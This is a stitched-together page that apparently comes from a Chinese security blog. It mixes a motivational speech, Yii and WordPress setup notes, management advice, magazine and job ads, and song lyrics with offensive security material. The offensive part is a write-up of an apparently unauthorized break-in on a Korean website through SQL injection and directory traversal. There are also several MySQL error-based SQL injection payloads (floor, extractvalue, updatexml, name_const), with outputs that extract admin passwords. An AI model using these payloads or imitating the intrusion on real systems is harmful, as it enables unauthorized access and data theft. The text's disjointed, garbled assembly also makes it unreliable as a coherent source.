这就好比学英语，十几年漫长岁月里我都在幻想，要通过多么复杂的流程，多么精密的设计，多么全面的涉及和多么不可思议的努力，终于有那么一天，或许我就能因为前期的那些无懈可击的学习，说一口比较流利的英语，像说中文一样，可以边说边想，而不是说每一句话之前，设计它的句式时态词汇，然后在心里复述几遍再看上去流利地背诵出来。谁不是这么设想的呢？可惜，它不仅从没有实现，并且让我看不到有任何实现趋势，对于每一个设立目标的人来说，没有比这更痛苦的感受。
但是在去了美国两年左右时间后，我忽然发现：自己已经可以毫无障碍地说一口流利的英语了。这并非我采用了什么新学习方法，而是因为去了印第安纳后，身边中国人很少，在没有选择的情况下，只能被迫用英语去交流和表达。
在这个过程中，我并没有认真想过自己每天进步了多少，也没有阶段性检验学习效果，只是不停去听和说，因为没有选择嘛。直到两年多后的忽然有一天我才意识到：咦，自己好像真的已经可以了。但是我确实无法总结出来，是如何一步一步做到的，只是那两年时间，我一直都在很不情愿地用英语去生活嘛。
一个人能获得的最可贵能力，都和掌握一门语言一样，你所付出的努力，不是能够获得即时回馈的，甚至在很长一段时间内，没有任何收获，直到积累到一定阶段，忽然爆发出惊人力量，连你自己都不清楚这一切是如何发生的。比如锻炼身体，读书写作，或者是做生意。当你经历了足够的量变，终于引起质变时拥有的技能，大部分人是终身难以企及的，不是因为他们太笨，恰恰相反，因为他们都太聪明了。
触发人类行动的最基本原理被称为“反射”，我们是需要即时回馈的物种。所以绝大多数人，对于世界的理解度是“线性”的，但更多情况下，事物却是以漫长的潜伏震荡后爆发突破的形式发展。
我现在时常觉得，人在少年时期更容易掌握语言、乐器、美术这些成年后很难学的技艺，并非那小时候就是天资聪颖，而是小孩子，很少会一个星期质疑一次自己收获了多少，都是闷头一练，就是好几年，直到学会才知道哦自己已经会了。只有聪明的成年人，才相信一本书读懂易经，10句话揭秘马云的成功之道，30 天成为吉他高手的故事。
简而言之，现实生活中，付出和结果之间，往往没有那么立竿见影。在离开学校之后，当我们遇到的很多事情，不再像做题和考试之间联系得那么紧密的时候，很多人的付出都是浅尝辄止。而最可贵的努力，是选择一个正确的方向，那些无法立即获得回报的事情，依然能付出十年如一日的专注和热情，最终的结果，也许不足以让你独孤求败，但足以出类拔萃。
人这一生中是否有一个“节点”，过了之后一切都会好起来？
前面说了这么多，谈论的都与“目标”和“实现目标”有关。仔细想想，我们的一生好像，都是在实现目标中挣扎着度过。上初中时，老师告诉你，中考的淘汰率是最高的，只要闯过去，上了高中一切就好了。但上了高中的时候，发现不是那么回事嘛，高中老师又说了啊，考上大学，就进了天堂。于是你考上大学，依然空虚迷茫各种草样年华，父母老师又告诉你，找到工作就好了。工作之后，发现烦恼和忧虑依然都在，女朋友给你看马云的故事，告诉你等你事业有成就好了……
你发现了吗？其实人这一辈子的每一个阶段，都有新的痛苦和顾虑，周而复始，生生不息。绝对不会因为你考上大学，事业有成，迎娶了女神，就从此“happily ever after&。但每一个阶段，也有每一个阶段的快乐，无法替代。生活不是安徒生童话也不是好莱坞电影，从出生的那一刻起，直到生命的尽头，都不存在什么“节点”，过去了之后，一切幸福美满无忧无虑。
每一段岁月都有它存在的价值，没有高低贵贱之分，都不应该被辜负。而我能想到的人这一生，能做的最愚蠢的事情，就是把全部人生的希望，都孤注一掷到未来的某个“节点”上，而忽略了生活本身应有的乐趣。哪怕你以后真正实现了那个执念中的目标，才会发现它远远没你想的那么美好。
年轻的时候和哥们在操场上打篮球喝可乐的快乐，是以后高尔夫球会所里品红酒替代不了的。尤其男生，千万不要总想着等将来有钱了如何如何，且不说你以后很可能不会太有钱，而且相信我，就是有钱了，也真的不能怎么样。
生命就在每天的生活里，一切执念都是虚妄。和身边的人愉快相处，认真安排好每一天的活动，用心去感受每一天的心境，就是生活的意义本身。这其实是我今天最想分享给你们的事情。
谢谢大家。
模块化 平台化 开放化宏观思维与微观思维的接轨
Yii创建应用
php E:/www/yii/framework/yiic.php webapp app
也可以用yii下framework目录下的bat来创建应用
创建成功后可直接用浏览器访问
下面是创建的初始应用的结构图：
Yii目录详解
Yii假定了一系列默认的目录用于不同的场合。如果需要，每个目录都可以自定义。
WebRoot/protected:&这是&应用基础目录，&是放置所有安全敏感的PHP脚本和数据文件的地方。Yii 有一个默认的 application 别名指向此目录。&此目录及目录中的文件应该保护起来防止Web用户访问。它可以通过&[CWebApplication::basePath]&自定义。
WebRoot/protected/runtime:&此目录放置应用在运行时产生的私有临时文件。&此目录必须对 Web 服务器进程可写。它可以通过&[CApplication::runtimePath]自定义。
WebRoot/protected/extensions:&此目录放置所有第三方扩展。&它可以通过&[CApplication::extensionPath]&自定义。
WebRoot/protected/modules:&此目录放置所有的应用&模块，每个模块使用一个子目录。
WebRoot/protected/controllers:&此目录放置所有控制器类文件。&它可以通过&[CWebApplication::controllerPath]&自定义。
WebRoot/protected/views:&此目录放置所有试图文件，&包含控制器视图，布局视图和系统视图。&它可以通过&[CWebApplication::viewPath]&自定义。
WebRoot/protected/views/ControllerID:&此目录放置单个控制器类中使用的视图文件。&此处的 ControllerID 是指控制器的 ID 。它可以通过&[CController::viewPath]&自定义。
WebRoot/protected/views/layouts:&此目录放置所有布局视图文件。它可以通过&[CWebApplication::layoutPath]&自定义。
WebRoot/protected/views/system:&此目录放置所有系统视图文件。&系统视图文件是用于显示异常和错误的模板。它可以通过&[CWebApplication::systemViewPath]&自定义。
WebRoot/assets:&此目录放置公共资源文件。&资源文件是可以被发布的，可由Web用户访问的私有文件。此目录必须对 Web 服务器进程可写。&它可以通过&[CAssetManager::basePath]&自定义
WebRoot/themes:&此目录放置应用使用的不同的主题。每个子目录即一个主题，主题的名字即目录的名字。&它可以通过&[CThemeManager::basePath]&自定义。
核心应用组件
Yii 预定义了一系列核心应用组件，提供常见 Web 应用中所用的功能。例如，&[request|CWebApplication::request]&组件用于解析用户请求并提供例如 URL，cookie 等信息。&通过配置这些核心组件的属性，我们可以在几乎所有的方面修改Yii&的默认行为。
下面我们列出了由&[CWebApplication]&预定义的核心组件。
[assetManager|CWebApplication::assetManager]:&[CAssetManager]&-&管理私有资源文件的发布。
[authManager|CWebApplication::authManager]:&[CAuthManager]&-&管理基于角色的访问控制&(RBAC).
[cache|CApplication::cache]:&[CCache]&-&提供数据缓存功能。注意，你必须指定实际的类（例如[CMemCache],&[CDbCache]）。&否则，当你访问此组件时将返回 NULL。
[clientScript|CWebApplication::clientScript]:&[CClientScript]&-&管理客户端脚本&(javascripts 和 CSS).
[coreMessages|CApplication::coreMessages]:&[CPhpMessageSource]&-&提供 Yii 框架用到的核心信息的翻译。
[db|CApplication::db]:&[CDbConnection]&-&提供数据库连接。注意，使用此组件你必须配置其&[connectionString|CDbConnection::connectionString]&属性。
[errorHandler|CApplication::errorHandler]:&[CErrorHandler]&-&处理未捕获的 PHP 错误和异常。
[format|CApplication::format]:&[CFormatter]&-&格式化数值显示。此功能从版本 1.1.0 起开始提供。
[messages|CApplication::messages]:&[CPhpMessageSource]&-&提供Yii应用中使用的信息翻译。
[request|CWebApplication::request]:&[CHttpRequest]&-&提供关于用户请求的信息。
[securityManager|CApplication::securityManager]:&[CSecurityManager]&-&提供安全相关的服务，例如散列，加密。
[session|CWebApplication::session]:&[CHttpSession]&-&提供session相关的功能。
[statePersister|CApplication::statePersister]:&[CStatePersister]&-&提供全局状态持久方法。
[urlManager|CWebApplication::urlManager]:&[CUrlManager]&-&提供 URL 解析和创建相关功能
[user|CWebApplication::user]:&[CWebUser]&-&提供当前用户的识别信息。
[themeManager|CWebApplication::themeManager]:&[CThemeManager]&-&管理主题。
原文地址：
Win32k 特权提升漏洞&- CVE-如果 Win32k.sys 内核模式驱动程序不正确地处理内存中的对象，则存在一个特权提升漏洞。&成功利用此漏洞的攻击者可以运行内核模式中的任意代码。&攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。&该更新通过更正 Windows 内核模式驱动程序处理内存中对象的方式来解决漏洞。要利用此漏洞，攻击者必须先登录到系统。&然后，攻击者可以运行一个为利用此漏洞而特制的应用程序，从而完全控制受影响的系统。此漏洞已公开披露。&发布此安全公告时，Microsoft 已经获悉会利用漏洞进行非常有限的目标攻击。Operation RussianDoll: Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia’s APT28 in Highly-Targeted Attack&Exp：
五月天 – 我不愿让你一个人
你说呢&明知你不在还是会问
空气却不能代替你出声
习惯像永不愈合的固执伤痕
一思念就撕裂灵魂
盒子ZONE是个什么gui？
盒子ZONE（）是安全盒子（）旗下基于网络安全知识交流及分享的微社区。
你能在盒子ZONE上干点什么？
不会的技术问题可以来这里问
会的技术可以在这里分享
结交更多的朋友，扩大自己的圈子
。。。。。。
盒子ZONE能为你做点什么？
维护好交流技术的氛围
邀请更多的技术大牛来一起玩
不定期线下沙龙及见面会
。。。。。。
盒子ZONE的联系方式
安全盒子C段旁注工具是由安全盒子安全团队（）用JAVA开发的一款C段旁注查询的工具，多个接口，查询速度快。
软件截图：
下载地址：
运行环境：
JRE6（java runtime environment6）
本次更新：
修复安全盒子图标不显示问题
降低程序运行版本为JRE 6.0
新增chinaz旁注接口
新增114best旁注接口
增加&是否获取标题选项（获取网页标题所费时间会略长）
新增bing旁注接口
修复其他bug
作者附言：
安全盒子旁注工具第二版增加了很多接口可供使用，并且根据大家的需求，把工具的运行环境降低为JRE 6.0。接下来会进入第三版的开发当中，预计在2015年3月底左右会和大家见面。&第二期我们的工具将会对UI进行彻底的改变，完全颠覆JAVA传统Frame的风格，届时请大家注意关注安全盒子官网的发布消息，感谢大家对安全盒子的支持。
建议意见：
如您对本软件有任何的疑问或建议,欢迎联系：
安全盒子C段旁注工具V5发布
windows xp,win7,win8 + jre7.0
预计在下月（2015年2月）增加其他站长工具的查询接口
安全盒子：
Oram& QQ：
版权所有&&安全盒子
如有建议或意见可联系安全盒子负责人王松_Striker（QQ：）或工具作者,感谢大家的支持&
IT公司研发部门的管理人员大多是从公司内部的技术人员中提拔的。在快速发展的公司里，这样的机会更多。然而这种“半路出家”的转型也给我们带来了很多挑战，其中最关键的部分在于思维方式的转变。
从个人成就到团队成就。
无论是做管理还是做技术，成就导向意识是优秀员工的基本素质。只有具备很强的成就导向意识，才能把事情做得超预期，才能追求卓越。
刚刚上任的管理人员的思维方式往往还处于个人成就导向阶段，他们希望向外界发出一个明确的信号，团队之所以取得这样的成绩或者解决某个难题，是因为我的组织和领导。然而这种信号被团队成员多次接到后，会产生功劳都被领导拿走的感觉，从而导致团队的向心力下降。
这时，比较好的做法是：要保护团队成员的成就导向，并且进行鼓励，从而刺激大家的积极性。例如，与某个团队成员共同解决了某个难题后，要弱化自己，重点表扬这个团队成员对问题的贡献。这样再遇到某个难题时，这个团队成员才能保持一样或更高的激情。只有将自己的成就感定位在团队成就上，才能站得更高，避免和团队成员产生直接竞争，从而有效地领导自己的团队。
上下同欲的氛围。
兵法有云：“上下同欲者胜”。一个团队能够健康运作的基础就是“上下同欲”的氛围。要想拥有这种氛围，必须处理好两件事情：发言权和信息透明。
发言权：每个人都希望发表自己对某件事情的看法，尤其是比较关键的事情，并获得聆听。如果管理人员屏蔽这些，所表达的就是一种不尊重。当然不是所有的意见都要被采纳，需要需要合理的决策，但要让大家有发言的机会。
信息透明：这里的信息包括一切可以公开的信息，如上级期望和项目进展等。保持这些信息的透明度，能够提高团队成员对团队绩效的关注度和荣辱感。当大家都站在团队的高度上思考问题时，能够省去很多协调工作。
转型到管理岗位后，就要多花些时间来考虑团队建设问题。只有团队的氛围比较好，才有机会取得较好的成绩。
合理计划，要事第一。
刚刚转型的管理人员往往会有类似这样的抱怨“杂事太多，被不停地打断”。造成这一问题的很大部分原因在于，计划不够周全或者缺乏例行沟通机制。例如，每日站立例会基本上可以消除很多这样的杂事。同时因为管理人员需要接触的人比较多，所以日常处理的事情也会比较多。这与技术人员有很大不同。
这时就要有非常合理的计划，保证要事被及时处理。需要注意的是，时间的急迫性往往会夸大事情的重要性。如果管理人员总是习惯将任务拖到最后的截止时间处理，则会打乱事情的优先级，导致做事失去计划性。
培养人才，用人所长。
杰克&韦尔奇说过：“在你成为领导之前，成功只同自己的成长有关。当你成为领导之后，成功同别人的成长有关。”&管理人员要把培养下属作为一件重要的事情，只有团队里的人才层出不穷，团队才有能力去不断挑战更高的目标。用人所长则指在工作的安排过程中需要多关注下属的长处，不能过度放大他们的缺点。正所谓“用人所长，天下无不用之人；用人所短，天下无可用之人”。人事任命需谨慎考虑，用对一个人，能省很多心；用错一个人，要操很多心。将合适的人放到合适的位置，是管理人员必须面对的一个难题。
时光如白驹过隙，不经意间，《安全参考》已经走过两个年头了，感谢两年来大家的支持，感谢团队小伙伴的辛苦付出！~
《安全参考》2014年12月第24期，也是2014年最后一期终于又如约跟大家见面了！
在接下来的2015年，我们会更加努力，为大家带来更好的安全技术内容，希望大家继续支持我们，我们一起铸造我们的安全国度！~
同样，为了感谢大家一直以来的支持和鼓励，我们在这一期中增加了更多精彩的内容。
小伙伴们，让我们一起分享这丰富精彩的安全盛宴吧！
内容丰富精彩，应有尽有，不容错过~
在这里感谢我们各位小伙伴们的辛勤付出，也感谢大家对《安全参考》的支持！
本期精彩内容
本期不仅有丰富多彩的常规渗透技巧，代码审计，黑客编程，还有各种SQL注入高级技巧，WAF绕过技巧等，
精彩的漏洞月报，专业的漏洞分析依然持续更新，还有大牛的各种PHP Bypass技巧哦！
更多最新漏洞分析，漏洞利用，漏洞修复，渗透技巧，挖洞技巧等详情请下载仔细品味哦！！！
精彩内容，不容错过~
大家赶快来围观，让更多的小伙伴们惊呆吧！
《安全参考》可以招租宣传广告，宣传彩页啦，重点是免费啊！！！
自从开始此活动后，持续有各道企业、团队、网站等都投递了宣传彩页，效果都很赞哦！~
免费广告有木有，造福广大朋友哦，如有需要欢迎联系！！！
本期杂志在线预览及下载地址
[HACKCTO-]PDF发行版本：
[HACKCTO-]DOC收藏版本：
往期杂志推荐
《安全参考》全部24期
我们想要做一个大事业,目前召唤靠谱的小伙伴！
线上线下都可以,线下地址在杭州,我们提供工作机会,
线下线上我们一起努力,完成我们共同的梦想!
入伙基本条件
充满热情,对Web安全的痴迷要像看到女朋友一样!(虽然IT男都没女朋友)
你可以不知道怎么去实现梦想,但你不能没有梦想,当然我希望我们的成功会是您的梦想,(一起努力,一起走,一起实现共同的梦想)
细节强迫症完,美主义者优先
欢迎屌丝,拒绝高富帅,
召唤有如下特长的小伙伴：
会挖洞的小伙伴：负责组建挖洞团队,进驻SRC
会渗透的小伙伴：你来写技术文摘,我们帮您推广
会市场运营的小伙伴：思维灵活，有较强的语言组织能力、自控能力，微博转发超过500条仍能相安无事者优先；
能开专栏的小伙伴：悉知业界动态，有一定的业界资源，文字功底好，每周最少码贴三篇！
会吐槽的小伙伴：资深吐槽帝，趣味屌丝男，出口成章，七步成诗，有超前的临时工精神；
有意向或者想详细了解的小伙伴(兄弟)可联系洽谈
WordPress从3.0开始已经是一个很好的多博客用户系统，但是，如果只是单单安装一个WordPress程序，单个博客看起来是孤立的，并没有建立相互之间的关联。我们可以通过bbPress与BuddyPress来建立一个基于WordPress的完整SNS社区网络。
首先安装WordPress，你还需要启用WordPress的插件功能。如果你在管理后台看到菜单中的Plugins后面有一个*，则表明你还没有激活plugins功能。
下面介绍一下安装BuddyPress的步骤：
1)&下载BuddyPress包；
2)&把包解压扔到WordPress 的这个目录下：/wp-content/plugins/buddypress/；
3)&在管理后台的Plugins里，启用BuddyPress这个插件；
4)&现在BuddyPress这个插件已经激活了,&但是我们还需要把BuddyPress的themes移动到正确的地方。把/wp-content/plugins/buddypress/bp-themes/拷贝到/wp-content/bp-themes/；
5) WordPress并没有基本的多用户首页，所以，我们需要启用BuddyPress的模板，这样才能达到真正在首页显示用户关联等诸多功能：把/wp-content/bp-themes/bphome/拷贝到/wp-content/themes/bphome/；
6)&在WordPress里激活the BuddyPress home模板。这样，就完成了基于BuddyPress的Wordpress定制。
下面介绍一下在WordPress里安装bbPress以及集成bbPress session的方法： 1)&安装bbPress，只需要根据bbPress的提示进行操作即可。最好让bbPress和WordPress用同一个数据库，这样，bbPress可以和WordPress-MU共享同一份用户数据，记得在安装的第二步把这个选上：Add user database integration settings。
2)&安装好了，到”bbPress的后台&–& Settings –& WordPress Integration”里，根据提示进行相关的设置。在这里，需要填写一些有关WordPress “auth” cookie salt，WordPress “secure auth” cookie salt，还有WordPress “logged in” cookie salt的值，这些值可以在WordPress-MU的安装目录下的wp-config.php文件里找。当然，也可以直接把下面的内容 define(‘AUTH_KEY’,&‘blahblah’); define(‘SECURE_AUTH_KEY’,&‘blahblah’); define(‘LOGGED_IN_KEY’,&‘blahblah’); define(‘NONCE_KEY’,&‘blahblah’);&从wp-config.php文件复制到bb-config.php文件里，并用BB_作为前缀进行适当地替换： define(‘BB_AUTH_KEY’,&‘blahblah’); define(‘BB_SECURE_AUTH_KEY’,&‘blahblah’); define(‘BB_LOGGED_IN_KEY’,&‘blahblah’); define(‘BB_NONCE_KEY’,&‘blahblah’);&这两种方法应该是等价的。
3)&再到WordPress后台里安装bbPress Integration插件，并在”管理后台&–& Settings –& bbPress Integration”里，按提示进行相关设置。就这样，你登陆WordPress的同时，也可以登陆bbPress了。通过集成BuddyPress和bbPress，我们就让WordPress具备了完备的社区功能。
工作地点：杭州&
工作职责：1、公司网站页面及活动页面的编写。2、公司活动及宣传产品进行美工设计。3、配合Web开发工程师完成一系列设计。
职位要求：1、有相关网页设计或UI设计作品的优先录用2、熟练使用 PS、AI 等图像处理软件;3、对设计有强烈兴趣;4、细节强迫症患者优先。&
投递简历时请附带个人作品详细个人介绍与简历投递至：（邮件标题格式为：“真名-Web前端工程师”）
《安全参考》2014年11月第23期终于又如约跟大家见面了！
为了感谢大家一直以来的支持和鼓励，我们在这一期中增加了更多精彩的内容。
小伙伴们，让我们一起分享这丰富精彩的安全盛宴吧！
内容丰富精彩，应有尽有，不容错过~
在这里感谢我们各位小伙伴们的辛勤付出，也感谢大家对《安全参考》的支持！
本期精彩内容
本期不仅有丰富多彩的常规渗透技巧，CMS渗透技巧，逆向工程，社会工程学，代码审计等，
还有精彩各种CTF实战技巧，精彩的漏洞月报，专业的漏洞分析。
更多最新漏洞分析，漏洞利用，漏洞修复等详情请下载仔细品味哦！！！
精彩内容，不容错过~
大家赶快来围观，让更多的小伙伴们惊呆吧！
从本期开始，《安全参考》可以招租宣传广告，宣传彩页啦，重点是免费啊！！！
免费广告有木有，造福广大朋友哦，欢迎联系！！！
听潮社区线下沙龙
时光如梭，听潮社区已经开站 3 周年了，感谢所有小伙伴对听潮一直的关注与支持。
同时，很高兴在论坛的三周年之际，能在金山安全应急响应中心的支持下，举办这次北京地区的线下技术沙龙。
我们盛情邀请所有关注我们的小伙伴参加这次听潮社区三周年北京地区的技术沙龙。
详情请见杂志！
KSRC又搞活动了
为了回馈长期以来一直支持金山安全建设的小伙伴们，金山安全应急响应中心现推出“提漏洞换礼品”的奖励活动，还在等什么，快来KSRC提漏洞吧！
详情请见：/notice/noticeDetail/11/
本期杂志在线预览及下载地址
[HACKCTO-]PDF发行版本：
[HACKCTO-]DOC收藏版本：
作者：Striker博客：Email：好久没有捅过站了,前几天朋友给我发来一个棒子站,&顿时怀着神兽Helen的心态,&操起棒子就上！！大概看了一下,基本环境是：PHP+MYSQL+Apache,大小写切换了一下,把最后的php换成phP,得知系统为Linux
&&&&随便点了几个链接,发现必须登陆才能访问,&&&
&&&&会提示无法访问然后跳到登陆页面,&&简单测试了一下,发现登录框存在注入&&
&&&&得知表前缀为：g4_ &字段前缀是mb_&&注入了一会儿发现尼玛这条语句没有带入where mb_password啊...&&就想着是分开判断的,&这会就愁了啊,&学着各位论坛朋友的姿势,&&去楼上看了会AV,&顿时感觉神清气爽思路清晰啊....&&然后去掉PHP文件名，试了试,发现存在目录遍历。&&
&&&&找了找没有找到什么能利用的东西,发现data目录下面有一个cheditor4目录,随后就去百度了一下这个编辑器,&&
&&&&果然收获不小呀,发现这是一款韩国比较成熟的社区程序, G4,&于是就下了一套源码,&&简单看了一下，&
&&&&果然是帐号密码分开验证的,&&&本来想装一套上去的,可是却发现各种报错,那还是算了吧,&仔细看看代码,&&同时把代码发给影阔了一份,&&&&&& ps:小影已经在兄弟连把菊花献给我了！&&&
&&&&&不过我们大影阔也确实没有让俺们失望,&说是找到了一个注入,表名可控&&
&&&&于是赶紧操起神兽的大屌就上,&&忙活了也无果,不过倒是爆出了数据库名是wfutures,&&最后找回密码处存在SQL注入漏洞,在11行的mb_no可控且直接带入查询,&&&
&&&&浏览器上测试了一下,发现网站确实存在该漏洞。&&
&&&&于是乎~~~&&
&&&&确定可以注入以后就开始构造语句注入帐号密码,&&
&&&&爆出来以后发现密码不是16位,也不是32位...&&然后就去代码里面找密码的加密方式,&发现&&
$mb_password=sql_password($mb_password);
找到sql_password的函数是这样的，&&
&&&&可以看到是用mysql的加密方式来加密的,&&&在本机测试了一下,&发现Mysql加密是41位的,&&
&&&&可是我们注入出来的的确不是41位,于是注入注入语句换成select length(mb_password) from xxxx 发现的确是41位,&&
&&&&&于是用substr截取到前几位&&然后再截取到后几位&得到密码：&
&&& AE68C3362DBF25AACB4C57
&解密的时候却发现。。。。&&&
&&&&&&&然后我和小影都没有思路了..&&于是我喊他去我寝室坐了一会儿,&&抽根烟,&办完事,&&下楼以后发现.....&&
&&&&果然是托了影阔菊花的福了....&&然后进后台,&&&可以改允许上传格式，&&
&&&&&但是该网站却非常奇葩的在上传以后随机自定义了后缀名,并且不显示后缀名,&&和影阔鼓捣了好久没有搞定,&&&发文章的时候还可以选择首位包涵php文件,可是尼玛只能包涵PHP文件....&各种截断都不可以,&&虽然木有拿下shell,（可能会有后续,只是可能！！可能！！！）&&但是也只能先这样收尾了，&&还有最后一个问题,这是影阔问我的,他说他现在电脑技术已经差不多了,&&想问问我：&&&&挖掘机技术到底哪家强?&
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select &!1)x group by concat((select table_name from information_schema.tables& limit 1),floor(rand(0)*2)));
举例如下：首先进行正常查询：
mysql& select * from article where id = 1;+----+-------+---------+| id | title | content |+----+-------+---------+|& 1 | test &| do it &&|+----+-------+---------+
假如id输入存在注入的话，可以通过如下语句进行报错。
mysql& select * from article where id = 1 and (select 1 from &(select count(*),concat(version(),floor(rand(0)*2))x from& information_schema.tables group by x)a);ERROR ): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。例如我们需要查询管理员用户名和密码：
mysql& select * from article where id = 1 and (select 1 from &(select count(*),concat((select pass from admin where id &=1),floor(rand(0)*2))x from information_schema.tables group by x)a);ERROR ): Duplicate entry 'admin8881' for key 'group_key'
mysql& select * from article where id = 1 and (select count(*)& from (select 1 union select null union select !1)x group by& concat((select pass from admin limit 1),floor(rand(0)*2)));ERROR ): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue测试语句如下
and extractvalue(1, concat(0x5c,&(select table_name from information_schema.tables limit 1)));
实际测试过程
mysql& select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--ERROR 1105 (HY000): XPATH syntax error:&'\admin888'
3、UpdateXml
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程
mysql& select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));ERROR 1105 (HY000): XPATH syntax error:&'^$admin888^$'
《安全参考》2014年9月第21期终于又如约跟大家见面了！
为了感谢大家一直以来的支持和鼓励，我们在这一期中增加了更多精彩的内容。
小伙伴们，让我们一起分享这丰富精彩的安全盛宴吧！
内容丰富精彩，应有尽有，不容错过~
在这里感谢我们各位小伙伴们的辛勤付出，也感谢大家对《安全参考》的支持！
本期精彩内容
本期不仅有丰富多彩的常规渗透技巧，CMS渗透技巧，还有精彩CTF Writeups分析，更有热门的APT专辑哦
精彩内容，不容错过~
大家赶快来围观，让更多的小伙伴们惊呆吧！
从本期开始，《安全参考》可以招租宣传广告，宣传彩页啦，重点是免费啊！！！
免费广告有木有，造福广大朋友哦，欢迎联系！！！
本期杂志在线预览及下载地址
[HACKCTO-]PDF发行版本：
/s/1jG9mfWE
[HACKCTO-]DOC收藏版本：
/s/1jGkP6xo
作者:王松(Striker)
首先来说一下我这个小构架的基本思路,如图:
现在我们有三个服务器,
130.251是反向代理转发服务器
130.251和130.238分别是负载服务器
Mysql服务器没有标出来,
为方便区分,我们先把1号负载的首页写成
2号负载的首页写成222222
然后我们现在控制130.251,&把nginx配置文件里面原本的server{}全部删掉,&在http{}里面加上:
Upstream myweb1{
#定义地址池
Server 192.168.130.238
Server 192.168.130.154
&&&&&&& listen &&&&& 80;
&&&&&&& server_name& ;
location /&{
proxy_pass http://myweb1;
#使用地址池
proxy_set_header Host $
#利用HOST变量向后端服务器传递需要解析的客户端访问的域名（传递域名）
proxy_set_header X-Forwarded-For $remote_
#$remote_addr 把客户端真实IP赋予X-Forwarded-For。后端服务器才能获取真实的客户端IP。以便记录日志，要不日志中记录的访问信息都是负载服务器，而不是客户端（传递IP）
上面的注释可以去掉,&其中换成绑定的域名~
我在测试的时候修改本地hosts文件进行了测试,
保存之后就搞定了,&我们来访问试试,
后记:此文仅做娱乐,演示之用,真的要做均衡负载可能使用lvs或其他,
利用SQL注入获取数据库数据，利用的方法可以大致分为联合查询、报错、布尔盲注以及延时注入，通常这些方法都是基于select查询语句中的SQL注射点来实现的。那么，当我们发现了一个基于insert、update、delete语句的注射点时（比如有的网站会记录用户浏览记录，包括referer、client_ip、user-agent等，还有类似于用户注册、密码修改、信息删除等功能），还可以用如上方法获取我们需要的数据吗？在这里，我们以MYSQL的显错为例，看一下如何在insert、update、delete的注射点中获取我们想要的数据。0x01 环境搭建
为了更好的演示注射效果，我们先利用下面的语句创建原始数据：create database newdb；createtable users(id int(3)&notnull auto_increment,username varchar(20)&notnull,password&varchar(20)&&notnull,primarykey&(id));insertinto users values(1,'Jane','Eyre');
看一下当前数据结构：
0x02 注入语法
因为我们这里是用的显错模式，所以思路就是在insert、update、delete语句中人为构造语法错误，利用如下语句：insertinto users (id, username, password)&values&(2,''inject here'','Olivia');insertinto users (id, username, password)&values&(2,&&inject here&&,'Olivia');
注意：大家看到本来是要填入username字段的地方，我们填了'inject here'和”inject here”两个字段来实现爆错，一个是单引号包含、一个是双引号包含，要根据实际的注入点灵活构造。0x03 利用updatexml()获取数据
updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。
payload：or updatexml(1,concat(0x7e,(version())),0)&or
Insert：INSERT INTO users (id, username, password) VALUES (2,'Olivia'or updatexml(1,concat(0x7e,(version())),0) or'',&'Nervo');
Update：UPDATE users SET password='Nicky'or updatexml(2,concat(0x7e,(version())),0) or''WHERE id=2and username='Olivia';
Delete：DELETE FROM users WHERE id=2or updatexml(1,concat(0x7e,(version())),0) or'';
提取数据：
由于篇幅有限，在insert、update、delete用法一致的时候，我会仅以insert为例说明。
所用的payload为：or updatexml(0,concat(0x7e,(SELECT concat(table_name)&FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0)&or
获取newdb数据库表名：
获取users表的列名：
利用insert获取users表的数据：
利用delete获取users表的数据：
我们可以用insert、update、delete语句获取到数据库表名、列名，但是不能用update获取当前表的数据：
在这里，为了演示用update获取数据，我们临时再创建一个含有id，name，address的students表，并插入一条数据：
再次利用update获取users表的数据：
如果你碰到一个update的注入并且想获取当前表的数据的话，可用用双查询，我后面会讲到。0x04 利用extractvalue()获取数据
extractvalue()函数也是MYSQL对XML文档数据进行查询和修改的XPATH函数。
payload：or extractvalue(1,concat(0x7e,database()))&or
Insert：INSERT INTO users (id, username, password) VALUES (2,'Olivia'or extractvalue(1,concat(0x7e,database())) or'',&'Nervo');
update：UPDATE users SET password='Nicky'or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2and username='Nervo';
delete：DELETE FROM users WHERE id=1or extractvalue(1,concat(0x7e,database())) or'';
提取数据：
同样，在insert、update、delete用法一致的时候，我会仅以insert为例说明。
获取newdb数据库表名：INSERT INTO users (id, username, password) VALUES (2,'Olivia'or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 1,1))) or'',&'Nervo');
获取users表的列名：INSERT INTO users (id, username, password) VALUES (2,'Olivia'or extractvalue(1,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1))) or'',&'Nervo');
获取users表的数据：INSERTINTO users (id, username, password)&VALUES&(2,'Olivia'or extractvalue(1,concat(0x7e,(SELECT concat_ws(':',id, username, password)&FROM users limit 0,1)))&or'',&'Nervo');
同样，我们可以用insert、update、delete语句获取到数据库表名、列名，但是不能用update获取当前表的数据。0x05 利用name_const()获取数据
name_const()函数是MYSQL5.0.12版本加入的一个返回给定值的函数。当用来产生一个结果集合列时&, NAME_CONST()&促使该列使用给定名称。
Payload：or (SELECT&*&FROM&(SELECT(name_const(version(),1)),name_const(version(),1))a)&or
Insert：INSERTINTO users (id, username, password)&VALUES&(1,'Olivia'or&(SELECT&*&FROM&(SELECT(name_const(version(),1)),name_const(version(),1))a)&or'','Nervo');
update：UPDATE users SET password='Nicky'or&(SELECT&*&FROM&(SELECT(name_const(version(),1)),name_const(version(),1))a)&or''WHERE id=2and username='Nervo';
delete：DELETEFROM users WHERE id=1or&(SELECT&*&FROM&(SELECT(name_const(version(),1)),name_const(version(),1))a)or'';
提取数据：
